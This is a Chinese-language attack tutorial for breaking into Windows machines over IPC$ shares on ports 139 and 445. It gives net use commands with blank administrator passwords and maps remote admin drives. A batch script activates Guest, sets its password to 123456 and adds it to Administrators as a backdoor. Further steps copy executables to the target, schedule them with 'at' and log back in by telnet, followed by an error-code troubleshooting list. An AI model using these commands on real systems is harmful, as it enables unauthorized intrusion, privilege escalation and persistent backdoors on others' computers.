前提條件
啟動服務
首先保證目標的IPC服務啟動,服務為lanmanWorkstation,顯示名為Workstations
端口
telnet目標計算機lanmanWorkstation服務的兩個端口,即139和445
telnet ip 139
telnet ip 445
啟動目標IPC共享
這些要在目標計算機下執行
net share ipc$
關閉
net share ipc$ /del
步驟
建立ipc$連接
net use \\IP\ipc$ "密碼" /user:"用戶名" (同樣有3個空格)
net use \\222.222.221.102\ipc$ "" /user:"administrator"
刪除一個ipc$連接
net use \\IP\ipc$ /del
映射遠程共享:
net use z: \\IP\Disk$
net use z: \\222.222.221.102\d$
刪除共享映射
net use z: /del 刪除映射的c盤,其他盤類推
net use * /del 刪除全部,會有提示要求按y確認
查看遠程主機的共享資源(但看不到默認共享)
net view \\IP
添加以后登錄賬號(以下命令要在目標主機執行,目標主機重啟后可用)
查看用戶名
net user
查看帳戶的屬性
net user 帳戶名
激活Guest用戶
net user guest /active:yes
修改Guest密碼
net user guest 123456
Guest變為Administrator
net localgroup administrators guest /add
可以將
net user guest /active:yes
net user guest 123456
net localgroup administrators guest /add
寫成bat拷貝到目標計算機去執行。
遠程執行bat
1.向遠程主機復制文件
copy \路徑\srv.exe \\IP\共享目錄名,如:
copy ccbirds.exe \\*.*.*.*\c 即將當前目錄下的文件復制到對方c盤內
2.遠程添加執行計划任務
at \\ip 時間 程序名,如:
at \\127.0.0.0 11:00 love.exe
注意:時間盡量使用24小時制;在系統默認搜索路徑(比如system32/)下不用加路徑,否則必須加全路徑
可以用同開啟權限的方式去開啟telnet服務,然后telnet目標主機
目標主機開啟了telnet的話可以
telnet 目標IP
輸入剛才留的賬戶和密碼
失敗原因
1)你的系統不是NT或以上操作系統;
2)對方沒有打開ipc$默認共享
3)對方未開啟139或445端口(惑被防火牆屏蔽)
4)你的命令輸入有誤(比如缺少了空格等)
5)用戶名或密碼錯誤(空連接當然無所謂了)
根據返回的錯誤號分析原因:
錯誤號5,拒絕訪問 : 很可能你使用的用戶不是管理員權限的,先提升權限;
錯誤號51,Windows 無法找到網絡路徑 : 網絡有問題;
錯誤號53,找不到網絡路徑 : ip地址錯誤;目標未開機;目標lanmanserver服務未啟動;目標有防火牆(端口過濾);
錯誤號67,找不到網絡名 : 你的lanmanworkstation服務未啟動;目標刪除了ipc$;
錯誤號1219,提供的憑據與已存在的憑據集沖突 : 你已經和對方建立了一個ipc$,請刪除再連。
錯誤號1326,未知的用戶名或錯誤密碼 : 原因很明顯了;
錯誤號1327,用戶賬戶限制阻止了此用戶進行登錄;
錯誤號1792,試圖登錄,但是網絡登錄服務沒有啟動 : 目標NetLogon服務未啟動。(連接域控會出現此情況)
錯誤號2242,此用戶的密碼已經過期 : 目標有帳號策略,強制定期要求更改密碼。